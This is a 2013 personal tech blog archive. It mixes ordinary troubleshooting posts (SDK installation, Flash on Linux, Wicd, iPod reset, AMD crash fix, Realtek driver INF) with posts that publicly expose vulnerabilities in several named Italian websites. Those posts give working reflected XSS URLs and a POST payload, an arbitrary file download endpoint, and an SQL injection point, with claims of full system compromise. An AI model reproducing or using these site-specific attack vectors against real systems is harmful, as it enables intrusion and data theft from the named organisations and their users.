Monday, 25 November 2013

If you have problems with the CSTRING and/or the inclusion of  stdafx.h, AFX, ATL, etc etc
If you are using visual studio express 2003 / 2010 / 2013
If you cannot install the visual studio 2013 SDK vssdk_full.exe
try to install the 2003 SDK
http://www.microsoft.com/en-us/download/details.aspx?id=6510




Download all the cab files.
Run PSDK-FULL.exe and choose the same folder where are located the cab files.
Run the PSDK-FULL.bat by adding a folder (the same path or something like c:\setupsdk).
Run the setup that fits your needs:
- SetupA64.Exe (64bit - worked on windows 7 and 8 without problems)
- Setup64.Exe (itanium 64?)
- Setup.Exe (32bit)

the autorun gives more info
[autorun]
OPEN=setup.exe

[Platform_x86]
Package=setup\PSDK-x86.msi

[Platform_AMD64]
Package=setup\PSDK-amd64.msi

[Platform_IA64]
Package=setup\PSDK-ia64.msi
___________________________

Just run whatever fits your needs.

___________________________



after the installation add  the include folder 
(ex. C:\Program Files\Microsoft Platform SDK\Include)
to your project

Remember that afxwin.h is MFC and it's not included in the version of VC++ Express Edition (that is free).

Friday, 16 August 2013

pdl.it | XSS








 XSS
sample
 http://servizi.pdl.it/cartoline/ancora-in-campo-per-l-italia/cartolina.php?img=ancora-in-campo-per-l-italia.jpg&ico=ancora-in-campo-per-l-italia-ico.jpg&lnk=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C%22bene.php&cartolina=1

also other arguments can be used for the XSS


XSS on another site with wordpress
http://www.gruppopdl-berlusconipresidente.it/wp-admin/admin-ajax.php?action=spiderbigcalendar&theme_id=3&calendar=1&date=2015-08&many_sp_calendar=1&cur_page_url=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

Sunday, 11 August 2013

Access emails from Outlook Web Access with any client email (ex. thunerbird, outlook express, outlook, evolution, pegasus, eudora, foxmail)

Access emails from Outlook Web Access with any client email (ex. thunerbird, outlook express, outlook, evolution, pegasus, eudora, foxmail)

If you are in hurry to download/access all your emails stored (only) on "Outlook Web Access" you can try those softwares:

- DavMail - http://sourceforge.net/projects/davmail/ - for windows 7, windows 8, windows vista, windows xp, linux, MacOsX
- freepops + owa.lua - for windows 7, windows 8, windows vista, windows xp, linux, MacOs X, BeOS .
- Thunderbird + ExQuilla - for windows 7, windows 8, windows vista, windows xp, linux, MacOs X


The most generic and rapid is DavMail























































ecadb.provincia.fe.it | remote files download, XSS, System compromise

http://ecadb.provincia.fe.it/samiraeca/fe/getimage.do?file={your file}

(requests shouldn't be done via browser but with a simple client)

_________________________________________

XSS
http://ecadb.provincia.fe.it/samiraeca/fe/ricercalibera.do
Just use a

a simple search with a term that can be found (ex. "este") and the option to find any submitted word
este <script>alert(1);</script>


Sample POST DATA
value%28VALUE%29=este+%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&value%28TYPE%29=7&value%28OPTION%29=1&value%28TSK%29=scheda_eca&fromform=1


_________________________________________

Etc

Saturday, 10 August 2013

install flash player on lubuntu ubuntu debian older versions | browser chromium, firefox




download: install_flash_player_11_linux.i386.tar.gz

from the official adobe website

uncompress the tar.gz file
tar xvf install_flash_player_11_linux.i386.tar.gz


chromium (in my case Version 25.0.1364.160 Ubuntu 11.10 (25.0.1364.160-0ubuntu0.11.10.1) )

$ sudo cp libflashplayer.so /usr/lib/chromium-browser/plugins/

Mozilla (make sure that you have installed it and the folder exists)
$ sudo cp libflashplayer.so ~/.mozilla/plugin/

and copy all the other files
$ cp -R ./usr/* /usr/



This should work to use flash player on Mozilla firefox and Chromium.
It applies even if (the older) pepper flash doesn't work.
A workaround can be done with the same procedure and the latest versions of adobe flash.

Supported OS:
Linux Lubuntu Flash Player
Linux Debian
Linux Ubuntu
Linux Red Hat

easy WPA on linux lubuntu/ubuntu/debian with GUI User Interface - easy way to use wpa without bad password problem

easy WPA on linux lubuntu/ubuntu/debian with GUI User Interface - easy way to use wpa without bad password problem

For example on Lubuntu we have the network manager that is not acting like expected and the same goes for wpa supplicant (see below)

wpa supplicant installation (NOT SUGGESTED)
wpa supplicant can be installed with those simple commands

$ sudo apt-get install wpasupplicant
and (if you want the gui)
$ sudo apt-get install wpagui

with the main problem is that wpagui doesn't recognize several wifi cards even if available from iwconfig (just read other tutorials if you don't even have the wifi network card shown via iwconfig).

As example this card doesn't show up with wpagui (on lubuntu 11):

description: Wireless interface
product: PRO/Wireless 2200BG [Calexico2] Network Connection
vendor: Intel Corporation
________________________


Fast Solution: 
Just install Wicd by using:
$ sudo apt-get install wicd


If you are still unable to use the wifi (with wpa) connection by getting errors regarding the authorization or bad password (if you are really sure that you are setting the correct password) with wicd on ubuntu/lubuntu just restart the service or reboot.

example:
$ sudo service wicd restart



________________________

Wicd DNS problems are not really problems

If you still have problems with the name resolutions just configure the preferences (global dns servers) of wicd with generic (or your own) DNS servers

example: 8.8.8.8    8.8.4.4  (google dns)

They can be also set for each specific wifi netwok.

Thursday, 11 April 2013

iPod Shuffle reset Utility for 64bit windows 10 (xp and above)

iPod Shuffle reset Utility (if iTunes fails)

Download the uncompressed "iPodResetUtilitySetup.exe" from one of the following links (mirrors):

Download from Onedrive
Mirror -  Tinyupload
Mirror -  Filesharing1
Mirror -  Exoshare
Mirror - EmbedUpload
Mirror - Multiup
  • Install iTunes for drivers etc (needed on Windows 64bit)
  • Make sure that iTunes is fully installed (the services are running).
  • Check if the iPod can be detected and sync by iTunes.
  • Close iTunes.
  • Run "iPodResetUtility.exe" with Windows XP compatibility mode and "Run as Administrator".
  • If the reset fails try to run  with Windows XP SP2 compatibility mode and "Run as Administrator".


Should work to:
reset iPod Shuffle on Windows XP 32 bit
reset iPod Shuffle on Windows Vista 32 bit
reset iPod Shuffle on Windows 7 32 bit
reset iPod Shuffle on Windows 8 32 bit
reset iPod Shuffle on Windows 8.1 32 bit
reset iPod Shuffle on Windows 10 32 bit

reset iPod Shuffle on Windows XP 64 bit
reset iPod Shuffle on Windows Vista 64 bit
reset iPod Shuffle on Windows 7 64 bit
reset iPod Shuffle on Windows 8 64 bit
reset iPod Shuffle on Windows 8.1 64 bit
reset iPod Shuffle on Windows 10 64 bit

restore iPod Shuffle first and second generation

NOTE: Remember that if you have an old ipod, that doesn't start at all without cable, it could be the battery that must be replaced.

If you need to reset other iPod just send me an email and I will do my best to find a a free solution to reset it.

Monday, 11 February 2013

kdbsync.exe Crash Error - Solutions to fix the problem


kdbsync

The problem will be also detected by Gpu-Z (opencl64 bug).


Workaround (not suggested)

We can remove the registry key so that it will not try to start at all

32 bit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AMD AVT

64 bit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AMD  AVT

 -possible value in the registry-
Cmd.exe /c start "AMD Accelerated Video Transcoding device initialization" /min "C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe" aml

This solution will not give you a set of features (as for the name "Accelerated Video Transcoding") but you will not notice the difference from before.

Solution

Reinstall the AVT and OpenCL.
Remember to close GPU-Z and any other application that can use OpenCL.

Sample path for the already installed drivers. It could also be within X:\ATI\...
(AVT)
C:\AMD\Support\12-10_vista_win7_win8_64_dd_ccc_whql_net4\Packages\Apps\AVT64\AVT64.msi

(OpenCL)
C:\AMD\Support\12-10_vista_win7_win8_64_dd_ccc_whql_net4\Packages\Apps\OpenCL64\OpenCL.msi

If you don't have those paths just download the drivers and unpack them.

It's possible that a different version of OpenCL.msi will not let you (un)install over the older version.




Monday, 21 January 2013

WIFI USB Dongle Drivers for RTL8182C, RTL8182CU, RTL8192C, RTL8192CU, RTL8188CU

WIFI USB Dongle Drivers for RTL8182C, RTL8182CU, RTL8192C, RTL8192CU, etc
The companies of the device can be Asus, Sitecom, Edimax, abocom, Amigo, Hercules, DLink, Belking, Zyxel, trendnet, feixun.

Working with Windows XP, Windows Vista 32bit (windows server 2008, Windows Vista 64bit (windows server 2008), Windows 7 32bit, Windows 7 64bit.

Download here the drivers

USB\VID_0BDA&PID_8176&REV_0200

netrtwlanu.inf sample

%RTL8188cu.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_8176        ; RTK 88CU board for B/G/N     
%RTL8188cu.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BFF&PID_8160        ; RTK 88CU board for B/G/N     
%RTL8188cu.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_8176&REV_0200&SS                                                  
%RTL8188cu_G.DeviceDesc% = RTL8192cu_G.ndi, USB\VID_0BDA&PID_8177       ; RTK 88CU board for B/G        ; RTK demo board for B/G
%RTL8188cu_G.DeviceDesc% = RTL8192cu_G.ndi, USB\VID_0BDA&PID_8177&REV_0200&SS                                                
%RTL8188ce_vau.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_8170                           ; RTK 88CE_VAU board for B/G/N 
%RTL8188ce_vau.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_8170&REV_0200&SS                                              
%RTL8188ce_vau_G.DeviceDesc% = RTL8192cu_G.ndi, USB\VID_0BDA&PID_817E                       ; RTK 88CE_VAU board for B/G   
%RTL8188ce_vau_G.DeviceDesc% = RTL8192cu_G.ndi, USB\VID_0BDA&PID_817E&REV_0200&SS                                            
%RTL8192ce_vau.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_817C                           ; RTK 92CE_VAU board for B/G/N 
%RTL8192ce_vau.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_817C&REV_0200&SS                                              
%RTL8192ce_vau.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_8186
%RTL8188cu_slim_solo.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_817A                     ; RTK slim_solo board for B/G/N
%RTL8188cu_slim_solo.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_817A&REV_0200&SS                                        
%RTL8188cu_slim_combo.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_817B                    ; RTK slim_combo board for B/G/N
%RTL8188cu_slim_combo.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_817B&REV_0200&SS                                       
%RTL8188ru.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_817F                               ; RTK 88RU board for B/G/N     
%RTL8188ru.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_817F&REV_0200&SS                                                  
%RTL8188ru.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_317F        ; RTK 88RU board for B/G/N
%RTL8188ru.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_317F&REV_0200&SS
%RTL8188cus_vl.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_818A        ; RTK 88RU board for B/G/N
%RTL8188cus_vl.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_818A&REV_0200&SS
%RTL8188cu.DeviceDesc% = RTL8192cu.ndi, USB\VID_103C&PID_1629 ; HP/Liteon                 ; HP/Liteon board for B/G/N    
%RTL8192cu.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_8192                                                              
%RTL8192cu.DeviceDesc% = RTL8192cu.ndi, USB\VID_0BDA&PID_8178                               ; RTK 92CU board for B/G/N     
%RTK_AZ88vau.DeviceDesc% = RTL8192cu.ndi, USB\VID_13D3&PID_3358        ; AZ 88CE_VAU for B/G/N
%RTK_AZ88vau_G.DeviceDesc% = RTL8192cu_G.ndi, USB\VID_13D3&PID_3359       ; AZ 88CE_VAU for B/G
%RTK_AZ88cus.DeviceDesc% = RTL8192cu.ndi, USB\VID_13D3&PID_3357        ; AZ 88CUS for B/G/N
;; For 8192D RTK common  ================================================================
%RTL8192du.DeviceDesc% = RTL8192du.ndi, USB\VID_0BDA&PID_8194
%RTL8192du0.DeviceDesc% = RTL8192du.ndi, USB\VID_0BDA&PID_8193&MI_00
%RTL8192du1.DeviceDesc% = RTL8192du1.ndi, USB\VID_0BDA&PID_8193&MI_01
;; For 8723 RTK common  ================================================================
%RTL8723u.DeviceDesc%  = RTL8723u.ndi, USB\VID_0BDA&PID_8724
%RTL8723u.DeviceDesc%  = RTL8723u.ndi, USB\VID_0BDA&PID_8724&MI_02
%RTL8188eu.DeviceDesc%  = RTL8192cu.ndi, USB\VID_0BDA&PID_8179
;; For 8192C Customerize ================================================================
[PCI.NTx86.6.0]
%PCI.DeviceDesc% = RTL8192cu.ndi, USB\VID_2019&PID_ED17
%PCI-2.DeviceDesc% = RTL8192cu.ndi, USB\VID_2019&PID_4902
%PCI_Abocom88cu.DeviceDesc% = RTL8192cu.ndi, USB\VID_2019&PID_AB2A
%PCI_Abocom92cu.DeviceDesc% = RTL8192cu.ndi, USB\VID_2019&PID_AB2B
%PCI_Vencer.DeviceDesc% = RTL8192cu.ndi, USB\VID_2019&PID_1201
;; For 8192D Customerize ================================================================
%PCI_Abocom_du0.DeviceDesc% = RTL8192du.ndi, USB\VID_2019&PID_AB2C&MI_00
%PCI_Abocom_du1.DeviceDesc% = RTL8192du1.ndi, USB\VID_2019&PID_AB2C&MI_01
%PCI_3_du0.DeviceDesc% = RTL8192du.ndi, USB\VID_2019&PID_4903&MI_00
%PCI_3_du1.DeviceDesc% = RTL8192du1.ndi, USB\VID_2019&PID_4903&MI_01
%PCI_4_du0.DeviceDesc% = RTL8192du.ndi, USB\VID_2019&PID_4904&MI_00
%PCI_4_du1.DeviceDesc% = RTL8192du1.ndi, USB\VID_2019&PID_4904&MI_01

Saturday, 12 January 2013

gazzettabenevento.it | SQL Injection

System crompromise, MySQL Server vulnerable, Apache Server Vulnerable.

Simple Sql Injection
http://gazzettabenevento.it/Sito2009/elencoc.php?NumPagCom=1{INJ HERE}&p=1


Twitter Delicious Facebook Digg Stumbleupon Favorites More